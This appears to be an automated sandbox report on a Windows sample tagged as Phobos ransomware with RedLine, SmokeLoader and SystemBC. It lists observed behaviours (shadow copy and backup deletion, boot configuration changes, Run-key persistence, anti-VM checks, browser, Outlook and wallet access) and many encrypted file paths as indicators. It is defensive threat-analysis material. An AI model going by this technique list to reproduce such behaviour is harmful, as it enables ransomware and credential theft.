Malware Analysis Report

2024-11-16 12:15

Sample ID 230625-hn7rpsec7y
Target file.exe
SHA256 160764e2f395ecd512ea174af36156ad0d2fbe3e3e78a63a90ff90307b22202a
Tags
phobos redline smokeloader systembc 1 agilenet backdoor collection evasion infostealer persistence ransomware spyware stealer themida trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

160764e2f395ecd512ea174af36156ad0d2fbe3e3e78a63a90ff90307b22202a

Threat Level: Known bad

The file file.exe was found to be: Known bad.

Malicious Activity Summary

phobos redline smokeloader systembc 1 agilenet backdoor collection evasion infostealer persistence ransomware spyware stealer themida trojan

Phobos

SystemBC

SmokeLoader

RedLine

Renames multiple (371) files with added filename extension

Deletes shadow copies

Modifies boot configuration data using bcdedit

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Downloads MZ/PE file

Deletes backup catalog

Modifies Windows Firewall

Blocklisted process makes network request

Themida packer

Checks BIOS information in registry

Reads user/profile data of web browsers

Loads dropped DLL

Executes dropped EXE

Checks computer location settings

Obfuscated with Agile.Net obfuscator

Drops startup file

Checks whether UAC is enabled

Accesses Microsoft Outlook profiles

Drops desktop.ini file(s)

Accesses cryptocurrency files/wallets, possible credential harvesting

Adds Run key to start application

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

Drops file in Program Files directory

Program crash

Unsigned PE

Enumerates physical storage devices

Uses Task Scheduler COM API

outlook_win_path

Suspicious use of WriteProcessMemory

outlook_office_path

Checks SCSI registry key(s)

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: GetForegroundWindowSpam

Suspicious behavior: EnumeratesProcesses

Uses Volume Shadow Copy service COM API

Interacts with shadow copies

Suspicious behavior: MapViewOfSection

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-06-25 06:54

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-06-25 06:54

Reported

2023-06-25 06:56

Platform

win7-20230621-en

Max time kernel

30s

Max time network

33s

Command Line

"C:\Users\Admin\AppData\Local\Temp\file.exe"

Signatures

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\file.exe

"C:\Users\Admin\AppData\Local\Temp\file.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"

Network

N/A

Files

memory/1016-54-0x0000000000BD0000-0x0000000000C1C000-memory.dmp

memory/1016-55-0x0000000004C90000-0x0000000004CD0000-memory.dmp

memory/2020-59-0x00000000021D0000-0x0000000002210000-memory.dmp

memory/2020-58-0x00000000021D0000-0x0000000002210000-memory.dmp

memory/1016-60-0x0000000004C90000-0x0000000004CD0000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-06-25 06:54

Reported

2023-06-25 06:56

Platform

win10v2004-20230621-en

Max time kernel

123s

Max time network

143s

Command Line

"C:\Users\Admin\AppData\Local\Temp\file.exe"

Signatures

Phobos

ransomware phobos

RedLine

infostealer redline

SmokeLoader

trojan backdoor smokeloader

SystemBC

trojan systembc

Deletes shadow copies

ransomware

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\547C.exe N/A

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Renames multiple (371) files with added filename extension

ransomware

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Deletes backup catalog

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\wbadmin.exe N/A

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\547C.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\547C.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-922299981-3641064733-3870770889-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\sv.bat.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-922299981-3641064733-3870770889-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\547C.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-922299981-3641064733-3870770889-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\SRD.bat.exe N/A

Drops startup file

Description Indicator Process Target
File created \??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\3EBF.exe C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\547C.exe N/A

Obfuscated with Agile.Net obfuscator

agilenet
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Reads user/profile data of web browsers

spyware stealer

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-922299981-3641064733-3870770889-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-922299981-3641064733-3870770889-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-922299981-3641064733-3870770889-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-922299981-3641064733-3870770889-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Riqyrsb = "C:\\Users\\Admin\\AppData\\Roaming\\Riqyrsb.exe" C:\Users\Admin\AppData\Local\Temp\3C2E.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\3EBF = "C:\\Users\\Admin\\AppData\\Local\\3EBF.exe" C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-922299981-3641064733-3870770889-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\3EBF = "C:\\Users\\Admin\\AppData\\Local\\3EBF.exe" C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\547C.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\$Recycle.Bin\S-1-5-21-922299981-3641064733-3870770889-1000\desktop.ini C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification F:\$RECYCLE.BIN\S-1-5-21-922299981-3641064733-3870770889-1000\desktop.ini C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification C:\Program Files\desktop.ini C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_checkbox_unselected_18.svg C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File created C:\Program Files\Microsoft Office\root\Licenses16\PowerPointVL_MAK-ul-phn.xrm-ms.id[CF072F13-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\FileIcons\FileLogoExtensions.targetsize-256.png C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\SwipeTeachingCalloutArchiveImage.layoutdir-LTR.gif C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\close_x.png C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-coredump.jar C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_3.6.73.0_x64__8wekyb3d8bbwe\Assets\Square310x310Logo.scale-200.png C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\OneNoteNewNoteMedTile.scale-125.png C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\uk-ua\ui-strings.js.id[CF072F13-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\S-1-5-21-922299981-3641064733-3870770889-1000-MergedResources-0.pri C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\selection-action-plugins\cpdf\plugin.js C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\feature.xml.id[CF072F13-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\plugins\access\libaccess_wasapi_plugin.dll C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\models\en-US.Calendar.ot C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\Images\PrintAndShare\Glyph_0xe7d5.png C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe\Assets\AppTiles\AppIcon.targetsize-30.png C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-80_altform-unplated_contrast-white.png C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File created C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageProviderFunctions.psm1.id[CF072F13-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ClickToRun\C2RINTL.pl-pl.dll C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification C:\Program Files\Common Files\System\Ole DB\es-ES\sqloledb.rll.mui C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File created C:\Program Files\VideoLAN\VLC\plugins\audio_output\libdirectsound_plugin.dll.id[CF072F13-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\Assets\GamesXboxHubSmallTile.scale-100_contrast-high.png C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\System\msvcr110.dll.id[CF072F13-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_x64__8wekyb3d8bbwe\Assets\InsiderHubMedTile.scale-200_contrast-black.png C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\ColorVertexShader.cso C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\root\ui-strings.js C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\javap.exe C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\toc.xml C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdVL_MAK-pl.xrm-ms C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\rsod\proof.es-es.msi.16.es-es.boot.tree.dat C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\WindowsBase.dll C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\Weather_LogoSmall.targetsize-16_altform-unplated.png C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-black\OneNoteAppList.targetsize-32_altform-unplated.png C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxCalendarAppList.targetsize-72_altform-unplated.png C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-attach.xml C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File created C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_Subscription1-ul-oob.xrm-ms.id[CF072F13-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\System.Spatial.NetFX35.dll C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\STRTEDGE\PREVIEW.GIF.id[CF072F13-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxCalendarBadge.scale-200.png C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\Assets\GamesXboxHubMedTile.scale-100_contrast-high.png C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\StandardR_Retail-pl.xrm-ms C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\Cartridges\msjet.xsl.id[CF072F13-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Common.DBConnection.exe.id[CF072F13-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ccme_ecc.dll C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File created C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusiness2019R_Retail-ul-phn.xrm-ms.id[CF072F13-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2018.826.98.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraAppList.contrast-black_targetsize-16.png C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_x64__8wekyb3d8bbwe\Assets\AlarmsAppList.targetsize-24_altform-lightunplated.png C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\1033\QuickStyles\casual.dotx.id[CF072F13-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\1033\SETLANG_K_COL.HXK.id[CF072F13-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\OpenSSL64.DllA\zlibwapi.dll C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\PersonaSpy\personaspybridge.js.id[CF072F13-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\Microsoft.Data.Odata.dll.id[CF072F13-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\Store.Purchase\Controls\SignInControl.xaml C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File created C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Tw Cen MT.xml.id[CF072F13-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusiness2019R_OEM_Perp3-ul-oob.xrm-ms C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected] C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\1033\ACEODBCI.DLL C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\FetchingMail-Dark.scale-150.png C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\ipsnor.xml C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\191.png C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-black\OneNoteSectionWideTile.scale-400.png C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.contrast-white_targetsize-60.png C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\InsiderHubSmallTile.scale-100.png C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 C:\Windows\System32\vds.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName C:\Windows\System32\vds.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\ldx999sx.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\ldx999sx.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\ldx999sx.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 C:\Windows\System32\vds.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\System32\vds.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
